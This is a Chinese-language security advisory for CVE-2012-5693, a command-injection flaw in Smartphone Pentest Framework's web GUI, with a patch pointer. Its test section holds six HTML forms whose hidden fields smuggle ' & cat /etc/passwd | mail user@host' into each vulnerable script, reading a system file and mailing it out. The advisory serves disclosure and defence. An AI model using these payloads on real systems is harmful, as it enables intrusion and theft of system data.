Smartphone Pentest Framework (SPF)多个OS命令执行安全漏洞
发布日期:2012-11-14
更新日期:2012-11-28
受影响系统:bulbsecurity Smartphone Pentest Framework < 0.1.2
描述:
BUGTRAQ ID:
56705
CVE ID:
CVE-2012-5693
Smartphone Pentest Framework (SPF)是开源的智能手机渗透测试框架。
Smartphone Pentest Framework 0.1.2及其他版本"/frameworkgui/"目录内的多个Perl脚本没有正确过滤system()函数的参数,导致攻击者能以Web服务器权限执行任意系统命令。
<*来源:High-Tech Bridge
链接:
https://www.htbridge.com/advisory/HTB23123
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<form action="http://[host]/remoteAttack.pl" method="post">
<input type="hidden" name="ipAddressTB" value=' & cat /etc/passwd | mail user@host' />
<input type="submit" id="btn">
</form>
<form action="http://[host]/frameworkgui/CSAttack.pl" method="post">
<input type="hidden" name="hostingPath" value=' & cat /etc/passwd | mail user@host' />
<input type="submit" id="btn">
</form>
<form action="http://[host]/frameworkgui/SEAttack.pl" method="post">
<input type="hidden" name="hostingPath" value=' & cat /etc/passwd | mail user@host' />
<input type="submit" id="btn">
</form>
<form action="http://[host]/frameworkgui/attach2agents.pl" method="post">
<input type="hidden" name="agentURLPath" value=' & cat /etc/passwd | mail user@host' />
<input type="submit" id="btn">
</form>
<form action="http://[host]/frameworkgui/attachMobileModem.pl" method="post">
<input type="hidden" name="appURLPath" value=' & cat /etc/passwd | mail user@host' />
<input type="submit" id="btn">
</form>
<form action="http://[host]/frameworkgui/guessPassword.pl" method="post">
<input type="hidden" name="ipAddressTB" value=' & cat /etc/passwd | mail user@host' />
<input type="submit" id="btn">
</form>
建议:
厂商补丁:
bulbsecurity
------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
https://github.com/georgiaw/Smartphone-Pentest-Framework浏览次数:4024
严重程度:0(网友投票)
